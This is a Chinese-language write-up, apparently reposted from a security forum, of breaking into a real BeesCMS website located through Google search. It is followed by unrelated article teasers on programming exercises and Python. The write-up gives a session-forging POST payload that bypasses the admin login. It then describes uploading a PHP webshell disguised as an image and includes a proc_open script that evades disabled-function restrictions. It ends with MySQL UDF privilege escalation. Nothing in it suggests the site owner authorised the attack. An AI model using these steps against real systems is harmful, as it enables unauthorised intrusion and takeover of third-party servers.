安全模式 提权_记一次渗透挖洞提权实战

摘要:这是一次挖掘cms通用漏洞时发现的网站,技术含量虽然不是很高,但是也拿出来和大家分享一下吧,希望能给一部分人带来收获。


0x01 进入后台

在通过googlehack语法挖掘beescms时发现了这个站点fb30c526e397c1f4bf66e900d318a8c5.png
利用网上的payload,在/mx_form/mx_form.php?id=12页面使用hackbarPOST以下数据

_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=100000000000000000000000000000000000

然后访问/admin便可以直接进入后台

0x02 拿shell

进入后台后在‘添加产品模块’处寻找到了上传点

2b47447ba67fa4ac882b1c067a8e7f9c.png

尝试上马,但提示‘上传图片格式不正确’,于是上传图片马抓包,在repeater里更改后缀为php,然后go

a6e9a6ddae02a705751a64f109ce026b.png

根据回显没有看出是否上传成功,但也没说失败。经过寻找在‘上传图片管理’处找到

fc5532ab9d629cd03a80ff5810a70c11.png

点击图片发现解析了,直接菜刀连接,拿到shell

0x03 绕过安全模式

拿到shell后进入终端查看权限,但却发现执行命令失败,可能远程启用了安全模式

22bea898130b24a14eb097b0aae31aa8.png

经过在网上一番查找得出:要找到未禁用的php执行函数。先上传了一个查看phpinfo的脚本,找到已禁用的函数

be0800ca154ee9d473993fa56e655612.png

发现proc_open函数未被禁用,于是找到如下php脚本

<?php $descriptorspec=array( //这个索引数组用力指定要用proc_open创建的子进程的描述符0=>array('pipe','r'), //STDIN1=>array('pipe','w'),//STDOUT2=>array('pipe','w') //STDERROR);$handle=proc_open('whoami',$descriptorspec,$pipes,NULL);//$pipes中保存的是子进程创建的管道对应到 PHP 这一端的文件指针($descriptorspec指定的)if(!is_resource($handle)){die('proc_open failed');}//fwrite($pipes[0],'ipconfig');print('stdout:
');while($s=fgets($pipes[1])){print_r($s);}print('===========
stderr:
');while($s=fgets($pipes[2])){print_r($s);}fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($handle);?>

上传后可以执行命令,成功绕过安全模式

344aec16dc59188e9db2fd4dc5622b28.png

0x04 提权

上图可以看出只是iis权限,能做的事很局限,所以要想办法提权。
菜刀中虽然不能执行命令,但是可以查看文件,于是找到了数据库配置文件

80cbaf5eb46552412189ef28c8af70ed.png

发现是mysql的数据库,想到udf提权,于是上传udf提权脚本(附件中)

461cefb5be3075f0613bcc8333128c8d.png

登录后导出udf便可以执行命令了

71ca7af6601ffffdc6f163306e13974d.png

提权成功,但是不可以添加用户,也不能开3389。


结语:希望路过的各位大佬可以指点迷津,也欢迎各位来找我交流探讨,感谢阅读。

参考链接:

PHP限制命令执行绕过https://www.cnblogs.com/R4v3n/articles/9081202.html 

d565c21a1239d4c6156354b9d1f8ca84.png

作者: PaperPen 

来源:先知社区

如有侵权,请联系删除

c3d3ec259535f9a995b1cbb848665aef.gif

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/530622.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

win7无法连接打印机拒绝访问_“Windows无法连接打印机,操作失败,错误为0x000003e3”...

请求大家帮助&#xff0c;昨天在共享打印机时出现“Windows无法连接打印机&#xff0c;操作失败&#xff0c;错误为0x000003e3”。在百度百科查询的资料修改了都不行(在不重装系统前提下&#xff0c;联想台式机都是win732位系统)&#xff0c;给大家一一列举&#xff0c;请求广大…

1108: 打印数字图形(函数专题)

1108: 打印数字图形&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 4040 解决: 2786 [提交] [状态] [讨论版] [命题人:admin] 题目描述 从键盘输入一个整数n(1≤n≤9),打印出指定的数字图形。要求在程序中定义并调用如下函数&#xff1a;PrintSpace…

类型全部为string_python小讲堂丨学了这么久的,这6种基本数据类型你真的理解了吗...

哈喽&#xff0c;大家好&#xff0c;欢迎来到python小讲堂&#xff0c;间歇性的努力&#xff0c;会导致持续性的一事无成&#xff0c;即使今天是除夕&#xff0c;我们也不能懈怠啊&#xff0c;今天我给大家带来的是关于python的6种基本数据类型的深入讲解&#xff0c;话不多说让…

1105: 判断友好数对(函数专题)

1105: 判断友好数对&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 5790 解决: 2629 [提交] [状态] [讨论版] [命题人:admin] 题目描述 输入两个正整数m和n&#xff0c;顺序输出m到n之间的所有友好数对。 如果两个整数的所有正因子之和&#xff08;…

防抖 节流_【前端面试】节流与防抖

我们用两张图表示什么是节流和防抖。防抖节流由图可见&#xff0c;防抖的意思是&#xff0c;当用户在一段时间内连续频繁的试图执行一个函数的时候&#xff0c;只有最后一次&#xff0c;函数被真正的执行。节流的意思是&#xff0c;当用户在某一个时刻执行了一次函数的时候&…

没数据时y轴不显示_Matplotlib数据可视化

1.Matplotlib介绍什么是MatplotlibMatplotlib是一个Python的绘图库&#xff0c;它可与 NumPy 一起使用&#xff0c;可以代替MMatplotlib安装由于Matplotlib是第三方库&#xff0c;所以我们需要安装它才可以使用。注意&#xff0c;Matplotlib3.0要求python3版本才可安装使用。安…

1099: 角谷猜想(多实例测试)

1099: 角谷猜想&#xff08;多实例测试&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 5930 解决: 3888 [提交] [状态] [讨论版] [命题人:admin] 题目描述 任何一个自然数&#xff0c;如果是偶数&#xff0c;就除以2&#xff0c;如果是奇数&#xff0c;就乘以3再加1。最…

python软件运行界面_python运行界面 python的图形用户界面怎么运行

为什么用Python开发界面应用程序1)wxWidgets是一个比MFC优雅的库&#xff0c;TortoiseCVS用wxWidges而不用MFC&#xff0c;就是因为wxWidgets好用&#xff0c;而不是为了可以移植。 2)Python的面向对象脚本语言编程适合快速界面开发 3)Python在服务器端和客户端都非常有前途&am…

1100: 求组合数(函数专题)

1100: 求组合数&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 6264 解决: 4653 [提交] [状态] [讨论版] [命题人:admin] 题目描述 马上要举办新生程序设计竞赛了&#xff0c;与以往不同的是&#xff0c;本次比赛以班为单位&#xff0c;为了全面衡量…

python画图隐藏画笔_python画图

转至&#xff1a;https://blog.csdn.net/weixin_43943977/article/details/1026913921、灰色樱花树from turtle import *from random import *from math import *def tree(n,l):pd()#下笔#阴影效果t cos(radians(heading()45))/80.25pencolor(t,t,t)pensize(n/3)forward(l)#画…

1101: 逆序数字(函数专题)

1101: 逆序数字&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 6333 解决: 4717 [提交] [状态] [讨论版] [命题人:admin] 题目描述 输入一个正整数n&#xff0c;计算n的逆序数m&#xff0c;输出m与n的和。要求程序定义一个inverse()函数和一个main(…

循环划线_经济内外双循环下的思考!

原创&#xff1a;群赢说到这个内外双循环&#xff0c;我们汽车后市场朋友们&#xff0c;应该知道车子发动机水冷系统就是一个双循环&#xff0c;内部小循环&#xff0c;外部大循环。在发动机温度不高的时候&#xff0c;水在做小循环&#xff0c;在发动机周边流动。当发动机温度…

1103: 平均学分绩点(函数专题)

1103: 平均学分绩点&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 5386 解决: 2917 [提交] [状态] [讨论版] [命题人:admin] 题目描述 平均学分绩点&#xff08;Grade Point Average&#xff0c;即GPA&#xff09;是以学分与绩点作为衡量学生学习的…

1102: 火车票退票费计算(函数专题)

1102: 火车票退票费计算&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 5055 解决: 3204 [提交] [状态] [讨论版] [命题人:admin] 题目描述 2013年起&#xff0c;火车票退票费比例下调&#xff1a;票面乘车站开车时间前48小时以上的按票价5%计退票费…

ksrot php_php中ksort函数的功能起什么作用呢?

摘要:下文讲述php中ksort函数的功能讲解&#xff0c;如下所示&#xff1b;ksort函数功能说明:根据数组的键名进行升序排列ksort语法:ksort(array,sortingtype);--------参数说明------array:必填参数,待进行操作的数组sortingtype&#xff1a;非必填参数&#xff0c;此参数值可…

1104: 求因子和(函数专题)

1104: 求因子和&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 4633 解决: 3669 [提交] [状态] [讨论版] [命题人:admin] 题目描述 输入正整数n&#xff08;2<n<1000&#xff09;&#xff0c;计算并输出n的所有正因子(包括1&#xff0c;不包括…

计算机组成原理实验软件仿真系统_计算机系统组成原理(基础)

网上关于计算机系统的讨论众说纷纭。刚开始&#xff0c;我卯足了劲想寻找一个标准答案&#xff0c;后来发现这并不存在&#xff01;因为计算机系统层次不一&#xff0c;看你从什么角度来理解这个问题。在这篇文章里&#xff0c;我的介绍一切从简&#xff0c;不求锦上添花&#…

1107: 回文数猜想(函数专题)

1107: 回文数猜想&#xff08;函数专题&#xff09; 时间限制: 1 Sec 内存限制: 128 MB 提交: 3922 解决: 2508 [提交] [状态] [讨论版] [命题人:admin] 题目描述 一个正整数&#xff0c;如果从左向右读&#xff08;称之为正序数&#xff09;和从右向左读&#xff08;称之为倒序…

机器人总动员中的小草_机器人总动员读后感

1机器人总动员读后感机器人总动员读后感(一)昨天&#xff0c;我看了一部电影《机器人总动员》&#xff0c;主人公是一个机器人&#xff0c;它叫瓦力。非常好看。这部电影讲的是几百年以后&#xff0c;地球被人们弄得全是垃圾&#xff0c;人类没办法在地球上生活了&#xff0c;只…

输入回车时结束循环python_python-用户输入退出以在循环时中断

最简单的解决方案可能是创建一个函数,该函数将显示的消息作为输入,并在测试其满足条件后返回用户输入&#xff1a;def guess_input(input_message):flag False#endless loop until we are satisfied with the inputwhile True:#asking for user inputguess input(input_messa…